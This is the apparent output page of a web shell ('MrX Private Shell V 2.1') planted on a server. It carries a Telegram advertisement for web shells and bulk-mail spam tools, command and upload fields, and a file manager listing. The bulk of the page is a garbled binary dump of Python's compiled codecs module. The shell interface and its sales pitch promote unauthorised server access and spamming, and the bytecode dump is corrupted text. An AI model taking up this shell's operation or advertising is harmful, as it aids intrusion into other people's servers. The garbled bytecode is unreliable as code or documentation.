__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
�

*�_i@����SrSSKrSSKrSSK7 /SQrSrS=r	r
S=rrS	r
S
r\RS:Xa\
=rr\
rO\=rr\r\
r\r\
r\r"SS
\5r"SS5r"SS\5r"SS\5r"SS\5r"SS\5r"SS\5r"SS\5r "SS5r!"SS5r"S2S!jr#S3S"jr$S#r%S$r&S%r'S&r(S'r)S(r*S4S)jr+S4S*jr,S+r-S,r.\/"S 5r0\/"S-5r1\/"S.5r2\/"S/5r3\/"S05r4\/"S15r5Sr7\7(aSSK8r8gg!\ar\"S\-5eSrCff=f!\6a Sr0Sr1Sr2Sr3Sr4Sr5N<f=f)5z�codecs -- Python Codec Registry, API and helpers.


Written by Marc-Andre Lemburg ([email protected]).

(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.

�N)�*z%Failed to load the builtin codecs: %s),�register�lookup�open�EncodedFile�BOM�BOM_BE�BOM_LE�BOM32_BE�BOM32_LE�BOM64_BE�BOM64_LE�BOM_UTF8�	BOM_UTF16�BOM_UTF16_LE�BOM_UTF16_BE�	BOM_UTF32�BOM_UTF32_LE�BOM_UTF32_BE�	CodecInfo�Codec�IncrementalEncoder�IncrementalDecoder�StreamReader�StreamWriter�StreamReaderWriter�
StreamRecoder�
getencoder�
getdecoder�getincrementalencoder�getincrementaldecoder�	getreader�	getwriter�encode�decode�
iterencode�
iterdecode�
strict_errors�
ignore_errors�replace_errors�xmlcharrefreplace_errors�backslashreplace_errors�namereplace_errors�register_error�lookup_errorss��s��s��s���littlec�>�\rSrSrSrSrS
SS.SjjrSrSrS	r	g)r�Sz0Codec details when looking up the codec registryTN)�_is_text_encodingc��[RXX#U45n	XylXlX)lXYlXilXIlX9lUbX�l	U	$�N)
�tuple�__new__�namer$r%�incrementalencoder�incrementaldecoder�streamwriter�streamreaderr3)
�clsr$r%r<r;r9r:r8r3�selfs
          �/usr/lib/python3.13/codecs.pyr7�CodecInfo.__new__^sQ���}�}�S�6��"N�O���	�����"4��"4��(��(���(�%6�"���c��SURRURRUR[	U54-$)Nz%<%s.%s object for encoding %s at %#x>)�	__class__�
__module__�__qualname__r8�id�r>s r?�__repr__�CodecInfo.__repr__ms:��6����*�*�D�N�N�,G�,G����B�t�H�&�&�	&rAc��[U5$r5)r6rGs r?�__getnewargs__�CodecInfo.__getnewargs__rs���T�{�rA)r3r%r$r:r9r8r<r;)NNNNN)
�__name__rDrE�__firstlineno__�__doc__r3r7rHrK�__static_attributes__�rAr?rrSs*��:���EI�?C�
�!�
�&�
rArc�,�\rSrSrSrSSjrSSjrSrg)r�ua�Defines the interface for stateless encoders/decoders.

The .encode()/.decode() methods may use different error
handling schemes by providing the errors argument. These
string values are predefined:

 'strict' - raise a ValueError error (or a subclass)
 'ignore' - ignore the character and continue with the next
 'replace' - replace with a suitable replacement character;
            Python will use the official U+FFFD REPLACEMENT
            CHARACTER for the builtin Unicode codecs on
            decoding and '?' on encoding.
 'surrogateescape' - replace with private code points U+DCnn.
 'xmlcharrefreplace' - Replace with the appropriate XML
                       character reference (only for encoding).
 'backslashreplace'  - Replace with backslashed escape sequences.
 'namereplace'       - Replace with \N{...} escape sequences
                       (only for encoding).

The set of allowed values can be extended via register_error.

c��[e)a�Encodes the object input and returns a tuple (output
object, length consumed).

errors defines the error handling to apply. It defaults to
'strict' handling.

The method may not store state in the Codec instance. Use
StreamWriter for codecs which have to keep state in order to
make encoding efficient.

The encoder must be able to handle zero length input and
return an empty object of the output object type in this
situation.

��NotImplementedError�r>�input�errorss   r?r$�Codec.encode�s
��""�!rAc��[e)aYDecodes the object input and returns a tuple (output
object, length consumed).

input must be an object which provides the bf_getreadbuf
buffer slot. Python strings, buffer objects and memory
mapped files are examples of objects providing this slot.

errors defines the error handling to apply. It defaults to
'strict' handling.

The method may not store state in the Codec instance. Use
StreamReader for codecs which have to keep state in order to
make decoding efficient.

The decoder must be able to handle zero length input and
return an empty object of the output object type in this
situation.

rUrWs   r?r%�Codec.decode�s
��*"�!rArQN��strict)rMrDrErNrOr$r%rPrQrAr?rrus���,"�&"rArc�>�\rSrSrSrS
SjrSSjrSrSrSr	Sr
g	)r�z�
An IncrementalEncoder encodes an input in multiple steps. The input can
be passed piece by piece to the encode() method. The IncrementalEncoder
remembers the state of the encoding process between calls to encode().
c��XlSUlg)z�
Creates an IncrementalEncoder instance.

The IncrementalEncoder may use different error handling schemes by
providing the errors keyword argument. See the module docstring
for a list of possible values.
�N)rY�buffer�r>rYs  r?�__init__�IncrementalEncoder.__init__�s������rAc��[e)z1
Encodes input and returns the resulting object.
rU�r>rX�finals   r?r$�IncrementalEncoder.encode��
��"�!rAc��g)z*
Resets the encoder to the initial state.
NrQrGs r?�reset�IncrementalEncoder.reset���rAc��g)z*
Return the current state of the encoder.
rrQrGs r?�getstate�IncrementalEncoder.getstate�s��rAc��g)zT
Set the current state of the encoder. state must have been
returned by getstate().
NrQ�r>�states  r?�setstate�IncrementalEncoder.setstate�rorA)rcrYNr]�F)rMrDrErNrOrer$rmrqrvrPrQrAr?rr�s ���
	�"��
�rArc�D�\rSrSrSrSSjrSrSSjrSrSr	Sr
S	rg
)
�BufferedIncrementalEncoder��z�
This subclass of IncrementalEncoder can be used as the baseclass for an
incremental encoder if the encoder must keep some of the output in a
buffer between calls to encode().
c�<�[RX5 SUlg�Nrb)rrercrds  r?re�#BufferedIncrementalEncoder.__init__�s���#�#�D�1���rAc��[er5rU�r>rXrYris    r?�_buffer_encode�)BufferedIncrementalEncoder._buffer_encode��
��"�!rAc�r�URU-nURX0RU5upEX5SUlU$r5)rcr�rY�r>rXri�data�result�consumeds      r?r$�!BufferedIncrementalEncoder.encode��9���{�{�U�"��!�0�0��{�{�E�J����9�o����
rAc�<�[RU5 SUlgr})rrmrcrGs r?rm� BufferedIncrementalEncoder.reset�s��� � ��&���rAc�,�UR=(d S$�Nr�rcrGs r?rq�#BufferedIncrementalEncoder.getstate�s���{�{��a�rAc�$�U=(d SUlgr}r�rts  r?rv�#BufferedIncrementalEncoder.setstate�s
���k�r��rAr�Nr]rx)rMrDrErNrOrer�r$rmrqrvrPrQrAr?rzrz�s%���
�
"�
�� �"rArzc�>�\rSrSrSrS
SjrSSjrSrSrSr	Sr
g	)riz�
An IncrementalDecoder decodes an input in multiple steps. The input can
be passed piece by piece to the decode() method. The IncrementalDecoder
remembers the state of the decoding process between calls to decode().
c��Xlg)z�
Create an IncrementalDecoder instance.

The IncrementalDecoder may use different error handling schemes by
providing the errors keyword argument. See the module docstring
for a list of possible values.
N�rYrds  r?re�IncrementalDecoder.__init__s	���rAc��[e)z0
Decode input and returns the resulting object.
rUrhs   r?r%�IncrementalDecoder.decoderkrAc��g)z)
Reset the decoder to the initial state.
NrQrGs r?rm�IncrementalDecoder.resetrorAc��g)a�
Return the current state of the decoder.

This must be a (buffered_input, additional_state_info) tuple.
buffered_input must be a bytes object containing bytes that
were passed to decode() that have not yet been converted.
additional_state_info must be a non-negative integer
representing the state of the decoder WITHOUT yet having
processed the contents of buffered_input.  In the initial state
and after reset(), getstate() must return (b"", 0).
)rArrQrGs r?rq�IncrementalDecoder.getstates��rAc��g)z�
Set the current state of the decoder.

state must have been returned by getstate().  The effect of
setstate((b"", 0)) must be equivalent to reset().
NrQrts  r?rv�IncrementalDecoder.setstate*rorAr�Nr]rx)rMrDrErNrOrer%rmrqrvrPrQrAr?rrs ���
�"��
�rArc�D�\rSrSrSrSSjrSrSSjrSrSr	Sr
S	rg
)
�BufferedIncrementalDecoderi2z�
This subclass of IncrementalDecoder can be used as the baseclass for an
incremental decoder if the decoder must be able to handle incomplete
byte sequences.
c�<�[RX5 SUlg�NrA)rrercrds  r?re�#BufferedIncrementalDecoder.__init__8s���#�#�D�1���rAc��[er5rUr�s    r?�_buffer_decode�)BufferedIncrementalDecoder._buffer_decode=r�rAc�r�URU-nURX0RU5upEX5SUlU$r5)rcr�rYr�s      r?r%�!BufferedIncrementalDecoder.decodeBr�rAc�<�[RU5 SUlgr�)rrmrcrGs r?rm� BufferedIncrementalDecoder.resetJs��� � ��&���rAc��URS4$r�r�rGs r?rq�#BufferedIncrementalDecoder.getstateNs�����Q��rAc��USUlgr�r�rts  r?rv�#BufferedIncrementalDecoder.setstateRs
���A�h��rAr�Nr]rx)rMrDrErNrOrer�r%rmrqrvrPrQrAr?r�r�2s%���
�
"�
�� �rAr�c�X�\rSrSrS
SjrSrSrSrSSjr\	4Sjr
SrS	rS
r
Srg)ri]c��XlX lg)a�Creates a StreamWriter instance.

stream must be a file-like object open for writing.

The StreamWriter may use different error handling
schemes by providing the errors keyword argument. These
parameters are predefined:

 'strict' - raise a ValueError (or a subclass)
 'ignore' - ignore the character and continue with the next
 'replace'- replace with a suitable replacement character
 'xmlcharrefreplace' - Replace with the appropriate XML
                       character reference.
 'backslashreplace'  - Replace with backslashed escape
                       sequences.
 'namereplace'       - Replace with \N{...} escape sequences.

The set of allowed parameter values can be extended via
register_error.
N)�streamrY�r>r�rYs   r?re�StreamWriter.__init___s��,���rAc�t�URXR5up#URRU5 g)z=Writes the object's contents encoded to self.stream.
        N)r$rYr��write)r>�objectr�r�s    r?r��StreamWriter.writexs*�����V�[�[�9��������$�rAc�D�URSRU55 g)zFWrites the concatenated list of strings to the stream
using .write().
rbN)r��join�r>�lists  r?�
writelines�StreamWriter.writeliness��
	
�
�
�2�7�7�4�=�!rAc��g)z�Resets the codec buffers used for keeping internal state.

Calling this method should ensure that the data on the
output is put into a clean state, that allows appending
of new fresh data without having to rescan the whole
stream to recover state.

NrQrGs r?rm�StreamWriter.reset�s��	
rAc�v�URRX5 US:XaUS:XaUR5 gggr��r��seekrm�r>�offset�whences   r?r��StreamWriter.seek�s1��������(��Q�;�6�Q�;��J�J�L�'�;rAc�(�U"URU5$�z>Inherit all other methods from the underlying stream.
        �r��r>r8�getattrs   r?�__getattr__�StreamWriter.__getattr__����
�t�{�{�D�)�)rAc��U$r5rQrGs r?�	__enter__�StreamWriter.__enter__�����rAc�8�URR5 gr5�r��close�r>�type�value�tbs    r?�__exit__�StreamWriter.__exit__���������rAc�F�[SURR-5e�Nzcan't serialize %s��	TypeErrorrCrM�r>�protos  r?�
__reduce_ex__�StreamWriter.__reduce_ex__�����,�t�~�~�/F�/F�F�G�GrA)rYr�Nr]�r)rMrDrErNrer�r�rmr�r�r�r�r�r�rPrQrAr?rr]s5���2 �"�

��$�*���HrArc��\rSrSr\rSSjrSSjrSSjrSSjr	SSjr
SrSS	jrS
r
Sr\4SjrS
rSrSrSrg)ri�c��XlX lSUlUR5UlURUlSUlg)aCreates a StreamReader instance.

stream must be a file-like object open for reading.

The StreamReader may use different error handling
schemes by providing the errors keyword argument. These
parameters are predefined:

 'strict' - raise a ValueError (or a subclass)
 'ignore' - ignore the character and continue with the next
 'replace'- replace with a suitable replacement character
 'backslashreplace' - Replace with backslashed escape sequences;

The set of allowed parameter values can be extended via
register_error.
rAN)r�rY�
bytebuffer�charbuffertype�_empty_charbuffer�
charbuffer�
linebufferr�s   r?re�StreamReader.__init__�s:��$�������!%�!4�!4�!6����0�0�����rAc��[er5rUrWs   r?r%�StreamReader.decode�s��!�!rAc�p�UR(a1URRUR5UlSUlUS:aUnUS:�a[	UR5U:�aO�US:aUR
R
5nOUR
R
U5nURU-nU(dOFURXPR5upgXWSUlU=RU-
slU(dOM�US:aURn
URUlU
$URSUn
URUSUlU
$![a\nU(aOURUSURUR5upgURSS9n	[	U	5S::aeSnAN�eSnAff=f)a�Decodes data from the stream self.stream and returns the
resulting object.

chars indicates the number of decoded code points or bytes to
return. read() will never return more data than requested,
but it might return less, if there is not enough available.

size indicates the approximate maximum number of decoded
bytes or code points to read for decoding. The decoder
can modify this setting as appropriate. The default value
-1 indicates to read and decode as much as possible.  size
is intended to prevent having to decode huge files in one
step.

If firstline is true, and a UnicodeDecodeError happens
after the first line terminator in the input only the first line
will be returned, the rest of the input will be kept until the
next call to read().

The method should use a greedy read strategy, meaning that
it should read as much data as is allowed within the
definition of the encoding and the given size, e.g.  if
optional encoding endings or state markers are available
on the stream, these should be read too.
NrT��keepends�)
r�r�r�r��lenr��readr�r%rY�UnicodeDecodeError�start�
splitlines)r>�size�chars�	firstline�newdatar��newchars�decodedbytes�exc�linesr�s           r?r��StreamReader.read�s���8�?�?�"�4�4�9�9�$�/�/�J�D�O�"�D�O��1�9��E����z��t���'�5�0���a�x��+�+�*�*�,���+�+�*�*�4�0���?�?�W�,�D���

�)-���T�;�;�)G�&��#�=�1�D�O��O�O�x�'�O���?�@�1�9��_�_�F�"�4�4�D�O�
�
��_�_�V�e�,�F�"�o�o�e�f�5�D�O��
��1&�
�����D��#�)�)�$4�d�k�k�B�+�H�$�/�/��/�>�E��5�z�1�}��%���
�s�E�
F5�AF0�/F0�0F5Nc��UR(akURSnURS	[UR5S:XaURSUlSUlU(dURSS9SnU$U=(d SnURnURUSS9nU(ah[
U[5(aURS	5(d+[
U[5(a(URS
5(aXPRSSS9-
nX5-
nURSS9nU(a�[U5S:�aoUSnUS	[U5S:�a%US==UR-
ss'X`lSUlOUSUR-UlU(dURSS9SnU$USnUSRSS9SnXx:waAURRUSS5UR-UlU(aUnU$UnU$U(aUb#U(aU(dURSS9SnU$US
:aUS-nGM�)z�Read one line from the input stream and return the
decoded data.

size, if given, is passed as size argument to the
read() method.

rr�NFr��HT)r��
�
)r�r����i@�)r�r�r�r�r�r��
isinstance�str�endswith�bytesr�)	r>r�r��line�readsizer�r�line0withend�line0withoutends	         r?�readline�StreamReader.readlines?���?�?��?�?�1�%�D�����"��4�?�?�#�q�(�#'�/�/�!�"4���"&���������6�q�9���K��:�2���%�%����9�9�X��9�6�D���t�S�)�)�d�m�m�D�.A�.A��t�U�+�+��
�
�e�0D�0D��I�I�1�A�I�6�6�D��L�D��O�O�T�O�2�E���u�:��>�!��8�D��a���5�z�A�~��b�	�T�_�_�4�	�*/��*.���+0��(�T�_�_�*D���#�#�����>�q�A���&��% %�Q�x��"'��(�"5�"5�u�"5�"E�a�"H���2�&*�&<�&<�&A�&A�%���)�&L�&*�o�o�'6�D�O��+����� /�����
�4�+����?�?�E�?�:�1�=�D�����$���A�
��]rAc�D�UR5nURU5$)aRead all lines available on the input stream
and return them as a list.

Line breaks are implemented using the codec's decoder
method and are included in the list entries.

sizehint, if given, is ignored since there is no efficient
way to finding the true end-of-line.

)r�r�)r>�sizehintr�r�s    r?�	readlines�StreamReader.readlinesds���y�y�{�����x�(�(rAc�B�SUlURUlSUlg)z�Resets the codec buffers used for keeping internal state.

Note that no stream repositioning should take place.
This method is primarily intended to be able to recover
from decoding errors.

rAN)r�r�r�r�rGs r?rm�StreamReader.resetss������0�0�����rAc�Z�URRX5 UR5 g)z[Set the input stream's current position.

Resets the codec buffers used for keeping state.
Nr�r�s   r?r��StreamReader.seek�s��
	
������(��
�
�rAc�@�UR5nU(aU$[e�z3Return the next decoded line from the input stream.)r�
StopIteration)r>r
s  r?�__next__�StreamReader.__next__�s���}�}�����K��rAc��U$r5rQrGs r?�__iter__�StreamReader.__iter__�r�rAc�(�U"URU5$r�r�r�s   r?r��StreamReader.__getattr__�r�rAc��U$r5rQrGs r?r��StreamReader.__enter__�r�rAc�8�URR5 gr5r�r�s    r?r��StreamReader.__exit__�r�rAc�F�[SURR-5er�r�r�s  r?r��StreamReader.__reduce_ex__�r�rA)r�r�r�rYr�r�r])rrF)NTr�)rMrDrErNr
r�rer%r�rrrmr�rr!r�r�r�r�r�rPrQrAr?rr�sR���N��2"�N�`I�V
)�����$�*���HrArc��\rSrSrSrSrSSjrSSjrSSjrSSjr	S	r
S
rSrSr
S
rSSjr\4SjrSrSrSrSrg)ri�z�StreamReaderWriter instances allow wrapping streams which
work in both read and write modes.

The design is such that one can use the factory functions
returned by the codec.lookup() function to construct the
instance.

�unknownc�P�XlU"X5UlU"X5UlX@lg)a
Creates a StreamReaderWriter instance.

stream must be a Stream-like object.

Reader, Writer must be factory functions or classes
providing the StreamReader, StreamWriter interface resp.

Error handling is done in the same way as defined for the
StreamWriter/Readers.

N)r��reader�writerrY)r>r��Reader�WriterrYs     r?re�StreamReaderWriter.__init__�s&�����V�,����V�,����rAc�8�URRU5$r5)r.r��r>r�s  r?r��StreamReaderWriter.read�s���{�{����%�%rANc�8�URRU5$r5)r.rr4s  r?r�StreamReaderWriter.readline�s���{�{�#�#�D�)�)rAc�8�URRU5$r5)r.r)r>rs  r?r�StreamReaderWriter.readlines�s���{�{�$�$�X�.�.rAc�,�[UR5$r)�nextr.rGs r?r�StreamReaderWriter.__next__�s���D�K�K� � rAc��U$r5rQrGs r?r!�StreamReaderWriter.__iter__�r�rAc�8�URRU5$r5)r/r�)r>r�s  r?r��StreamReaderWriter.write�s���{�{� � ��&�&rAc�8�URRU5$r5)r/r�r�s  r?r��StreamReaderWriter.writelines�s���{�{�%�%�d�+�+rAc�l�URR5 URR5 gr5�r.rmr/rGs r?rm�StreamReaderWriter.reset��"�������������rAc��URRX5 URR5 US:Xa"US:XaURR5 gggr�)r�r�r.rmr/r�s   r?r��StreamReaderWriter.seek�sH��������(��������Q�;�6�Q�;��K�K����'�;rAc�(�U"URU5$r�r�r�s   r?r��StreamReaderWriter.__getattr__�r�rAc��U$r5rQrGs r?r��StreamReaderWriter.__enter__�r�rAc�8�URR5 gr5r�r�s    r?r��StreamReaderWriter.__exit__�r�rAc�F�[SURR-5er�r�r�s  r?r�� StreamReaderWriter.__reduce_ex__�r�rA)rYr.r�r/r]�rr5r�)rMrDrErNrO�encodingrer�rrrr!r�r�rmr�r�r�r�r�r�rPrQrAr?rr�sZ����H��$&�*�/�!�
�'�,��
 �$�*���HrArc��\rSrSrSrSrSrSSjrSSjrSSjr	SSjr
S	rS
rSr
SrS
rSSjr\4SjrSrSrSrSrg)ri�a�StreamRecoder instances translate data from one encoding to another.

They use the complete set of APIs returned by the
codecs.lookup() function to implement their task.

Data written to the StreamRecoder is first decoded into an
intermediate format (depending on the "decode" codec) and then
written to the underlying stream using an instance of the provided
Writer class.

In the other direction, data is read from the underlying stream using
a Reader instance and then encoded and returned to the caller.

r,c�h�XlX lX0lU"X5UlU"X5UlX`lg)a\Creates a StreamRecoder instance which implements a two-way
conversion: encode and decode work on the frontend (the
data visible to .read() and .write()) while Reader and Writer
work on the backend (the data in stream).

You can use these objects to do transparent
transcodings from e.g. latin-1 to utf-8 and back.

stream must be a file-like object.

encode and decode must adhere to the Codec interface; Reader and
Writer must be factory functions or classes providing the
StreamReader and StreamWriter interfaces resp.

Error handling is done in the same way as defined for the
StreamWriter/Readers.

N)r�r$r%r.r/rY)r>r�r$r%r0r1rYs       r?re�StreamRecoder.__init__s0��*�������V�,����V�,����rAc�v�URRU5nURX R5up#U$r5)r.r�r$rY�r>r�r��bytesencodeds    r?r��StreamRecoder.read/s0���{�{����%��!�[�[��{�{�;����rANc��UcURR5nOURRU5nURX R5up#U$r5)r.rr$rYrWs    r?r�StreamRecoder.readline5sG���<��;�;�'�'�)�D��;�;�'�'��-�D�!�[�[��{�{�;����rAc��URR5nURX R5up#UR	SS9$)NTr�)r.r�r$rYr�)r>rr�rXs    r?r�StreamRecoder.readlines>s:���{�{���!��!�[�[��{�{�;��������-�-rAc�j�[UR5nURXR5upU$r)r;r.r$rY)r>r�rXs   r?r�StreamRecoder.__next__Ds,���D�K�K� ��!�[�[��{�{�;����rAc��U$r5rQrGs r?r!�StreamRecoder.__iter__Kr�rAc�r�URXR5upURRU5$r5)r%rYr/r�)r>r��bytesdecodeds   r?r��StreamRecoder.writeNs,��!�[�[��{�{�;����{�{� � ��&�&rAc��SRU5nURX R5up#URR	U5$r�)r�r%rYr/r�)r>r�r�rcs    r?r��StreamRecoder.writelinesSs9���x�x��~��!�[�[��{�{�;����{�{� � ��&�&rAc�l�URR5 URR5 gr5rDrGs r?rm�StreamRecoder.resetYrFrAc�p�URRX5 URRX5 gr5)r.r�r/r�s   r?r��StreamRecoder.seek^s(��	
������(�������(rAc�(�U"URU5$r�r�r�s   r?r��StreamRecoder.__getattr__dr�rAc��U$r5rQrGs r?r��StreamRecoder.__enter__kr�rAc�8�URR5 gr5r�r�s    r?r��StreamRecoder.__exit__nr�rAc�F�[SURR-5er�r�r�s  r?r��StreamRecoder.__reduce_ex__qr�rA)r%r$rYr.r�r/r]rQr5r�)rMrDrErNrO�
data_encoding�
file_encodingrer�rrrr!r�r�rmr�r�r�r�r�r�rPrQrAr?rr�sd��
��M��M�!��8��.���'�
'��
)�$�*���HrArr^c���UbSU;aUS-n[R"XU5nUcU$[U5n[XVRUR
U5nX'lU$! UR5 e=f)a�Open an encoded file using the given mode and return
a wrapped version providing transparent encoding/decoding.

Note: The wrapped version will only accept the object format
defined by the codecs, i.e. Unicode objects for most builtin
codecs. Output is also codec dependent and will usually be
Unicode as well.

If encoding is not None, then the
underlying encoded files are always opened in binary mode.
The default file mode is 'r', meaning to open the file in read mode.

encoding specifies the encoding which is to be used for the
file.

errors may be given to define the error handling. It defaults
to 'strict' which causes ValueErrors to be raised in case an
encoding error occurs.

buffering has the same meaning as for the builtin open() API.
It defaults to -1 which means that the default buffer size will
be used.

The returned wrapped file object provides an extra attribute
.encoding which allows querying the used encoding. This
attribute is only available if an encoding was specified as
parameter.

�b)�builtinsrrrr<r;rRr�)�filename�moderRrY�	buffering�file�info�srws        r?rrvs{��>��
�$���c�z���=�=���3�D�������h��� ��'8�'8�$�:K�:K�V�T�����
����
�
��
�s�3A � A3c���UcUn[U5n[U5n[XRURURUR
U5nXlX&lU$)a]Return a wrapped version of file which provides transparent
encoding translation.

Data written to the wrapped file is decoded according
to the given data_encoding and then encoded to the underlying
file using file_encoding. The intermediate data type
will usually be Unicode but depends on the specified codecs.

Bytes read from the file are decoded using file_encoding and then
passed back to the caller encoded using data_encoding.

If file_encoding is not given, it defaults to data_encoding.

errors may be given to define the error handling. It defaults
to 'strict' which causes ValueErrors to be raised in case an
encoding error occurs.

The returned wrapped file object provides two extra attributes
.data_encoding and .file_encoding which reflect the given
parameters of the same name. The attributes can be used for
introspection by Python programs.

)rrr$r%r<r;rsrt)r{rsrtrY�	data_info�	file_info�srs       r?rr�sd��2��%�
��}�%�I��}�%�I�	�t�-�-�y�/?�/?� �-�-�y�/E�/E�v�
O�B�%��$��
�IrAc�,�[U5R$)z�Lookup up the codec for the given encoding and return
its encoder function.

Raises a LookupError in case the encoding cannot be found.

)rr$�rRs r?rr�����(��"�"�"rAc�,�[U5R$)z�Lookup up the codec for the given encoding and return
its decoder function.

Raises a LookupError in case the encoding cannot be found.

)rr%r�s r?rr�r�rAc�L�[U5RnUc[U5eU$)z�Lookup up the codec for the given encoding and return
its IncrementalEncoder class or factory function.

Raises a LookupError in case the encoding cannot be found
or the codecs doesn't provide an incremental encoder.

)rr9�LookupError)rR�encoders  r?r r ��)���X��1�1�G����(�#�#��NrAc�L�[U5RnUc[U5eU$)z�Lookup up the codec for the given encoding and return
its IncrementalDecoder class or factory function.

Raises a LookupError in case the encoding cannot be found
or the codecs doesn't provide an incremental decoder.

)rr:r�)rR�decoders  r?r!r!�r�rAc�,�[U5R$)z�Lookup up the codec for the given encoding and return
its StreamReader class or factory function.

Raises a LookupError in case the encoding cannot be found.

)rr<r�s r?r"r"�����(��(�(�(rAc�,�[U5R$)z�Lookup up the codec for the given encoding and return
its StreamWriter class or factory function.

Raises a LookupError in case the encoding cannot be found.

)rr;r�s r?r#r#r�rAc+�# �[U5"U40UD6nUH!nURU5nU(dMUv� M# URSS5nU(aUv� gg7f)z�
Encoding iterator.

Encodes the input strings from the iterator using an IncrementalEncoder.

errors and kwargs are passed through to the IncrementalEncoder
constructor.
rbTN)r r$)�iteratorrRrY�kwargsr�rX�outputs       r?r&r&s\���$�H�-�f�?��?�G�������&���6��L���^�^�B��
%�F�
�����
�.A�'Ac+�# �[U5"U40UD6nUH!nURU5nU(dMUv� M# URSS5nU(aUv� gg7f)z�
Decoding iterator.

Decodes the input strings from the iterator using an IncrementalDecoder.

errors and kwargs are passed through to the IncrementalDecoder
constructor.
rATN)r!r%)r�rRrYr�r�rXr�s       r?r'r'#s\���$�H�-�f�?��?�G�������&���6��L���^�^�C��
&�F�
����r�c�2�UVs0sHoU_M sn$s snf)zsmake_identity_dict(rng) -> dict

Return a dictionary where elements of the rng sequence are
mapped to themselves.

rQ)�rng�is  r?�make_identity_dictr�7s�����A�a�C�����s�c�Z�0nUR5Hup#X1;aX!U'MSX'M U$)aMCreates an encoding map from a decoding map.

If a target mapping in the decoding map occurs multiple
times, then that target is mapped to None (undefined mapping),
causing an exception when encountered by the charmap codec
during translation.

One example where this happens is cp875.py which decodes
multiple character to \u001a.

N)�items)�decoding_map�m�k�vs    r?�make_encoding_mapr�As8��	�A��!�!�#����v��a�D��A�D�	$�

�HrA�ignore�replace�xmlcharrefreplace�backslashreplace�namereplace)�rNr^r)Nr^r])9rOrw�sys�_codecs�ImportError�why�SystemError�__all__rr
rr	rrr�	byteorderrrrrrrr
r6rrr�rrzrr�rrrrrrrrr r!r"r#r&r'r�r�r/r(r)r*r+r,r-r��_false�	encodingsrQrAr?�<module>r�s����
�E��
-��0��$�#���$�#���#��#���=�=�H��#�"�C�)��I�
#�"�C�)��I���������
 �� �D@"�@"�D&��&�P "�!3� "�D/��/�b"�!3�"�VHH�5�HH�XxH�5�xH�xVH�VH�tsH�sH�n/�b"�L#�#���)�)��$�(�
�.� ��*�M� ��*�M�!�)�,�N�+�,?�@��*�+=�>��%�m�4��
��	��
��u"�E�
�=��C�
D�D��E��\"���M��M��N�#��"�����s)�D� 0D8�D5�%D0�0D5�8E
�E


Filemanager

Name Type Size Permission Actions
__future__.cpython-313.pyc File 4.61 KB 0644
__hello__.cpython-313.pyc File 966 B 0644
_aix_support.cpython-313.pyc File 4.61 KB 0644
_android_support.cpython-313.pyc File 7.44 KB 0644
_apple_support.cpython-313.pyc File 3.4 KB 0644
_collections_abc.cpython-313.pyc File 45.6 KB 0644
_colorize.cpython-313.pyc File 3.92 KB 0644
_compat_pickle.cpython-313.pyc File 7.02 KB 0644
_compression.cpython-313.pyc File 7.62 KB 0644
_distutils_system_mod.cpython-313.pyc File 7.89 KB 0644
_ios_support.cpython-313.pyc File 2.65 KB 0644
_markupbase.cpython-313.pyc File 12.14 KB 0644
_opcode_metadata.cpython-313.pyc File 10.43 KB 0644
_osx_support.cpython-313.pyc File 17.7 KB 0644
_py_abc.cpython-313.pyc File 7.02 KB 0644
_pydatetime.cpython-313.pyc File 92.36 KB 0644
_pydecimal.cpython-313.pyc File 211.95 KB 0644
_pyio.cpython-313.pyc File 108.59 KB 0644
_pylong.cpython-313.pyc File 10.9 KB 0644
_sitebuiltins.cpython-313.pyc File 4.79 KB 0644
_strptime.cpython-313.pyc File 28.04 KB 0644
_sysconfigdata__linux_x86_64-linux-gnu.cpython-313.pyc File 60.07 KB 0644
_sysconfigdata__x86_64-linux-gnu.cpython-313.pyc File 60.06 KB 0644
_threading_local.cpython-313.pyc File 8.19 KB 0644
_weakrefset.cpython-313.pyc File 11.77 KB 0644
abc.cpython-313.pyc File 7.73 KB 0644
antigravity.cpython-313.pyc File 985 B 0644
argparse.cpython-313.pyc File 102.11 KB 0644
ast.cpython-313.pyc File 100.56 KB 0644
base64.cpython-313.pyc File 25.21 KB 0644
bdb.cpython-313.pyc File 39.61 KB 0644
bisect.cpython-313.pyc File 3.42 KB 0644
bz2.cpython-313.pyc File 14.81 KB 0644
cProfile.cpython-313.pyc File 8.46 KB 0644
calendar.cpython-313.pyc File 38.76 KB 0644
cmd.cpython-313.pyc File 18.52 KB 0644
code.cpython-313.pyc File 15.41 KB 0644
codecs.cpython-313.pyc File 39.59 KB 0644
codeop.cpython-313.pyc File 6.48 KB 0644
colorsys.cpython-313.pyc File 4.4 KB 0644
compileall.cpython-313.pyc File 20.22 KB 0644
configparser.cpython-313.pyc File 67.32 KB 0644
contextlib.cpython-313.pyc File 29.78 KB 0644
contextvars.cpython-313.pyc File 261 B 0644
copy.cpython-313.pyc File 10.38 KB 0644
copyreg.cpython-313.pyc File 7.36 KB 0644
csv.cpython-313.pyc File 20.21 KB 0644
dataclasses.cpython-313.pyc File 46.7 KB 0644
datetime.cpython-313.pyc File 411 B 0644
decimal.cpython-313.pyc File 2.93 KB 0644
difflib.cpython-313.pyc File 70.35 KB 0644
dis.cpython-313.pyc File 46.4 KB 0644
doctest.cpython-313.pyc File 105.01 KB 0644
enum.cpython-313.pyc File 83.7 KB 0644
filecmp.cpython-313.pyc File 14.67 KB 0644
fileinput.cpython-313.pyc File 20.15 KB 0644
fnmatch.cpython-313.pyc File 6.64 KB 0644
fractions.cpython-313.pyc File 37.42 KB 0644
ftplib.cpython-313.pyc File 41.34 KB 0644
functools.cpython-313.pyc File 41.26 KB 0644
genericpath.cpython-313.pyc File 7.63 KB 0644
getopt.cpython-313.pyc File 8.27 KB 0644
getpass.cpython-313.pyc File 7.14 KB 0644
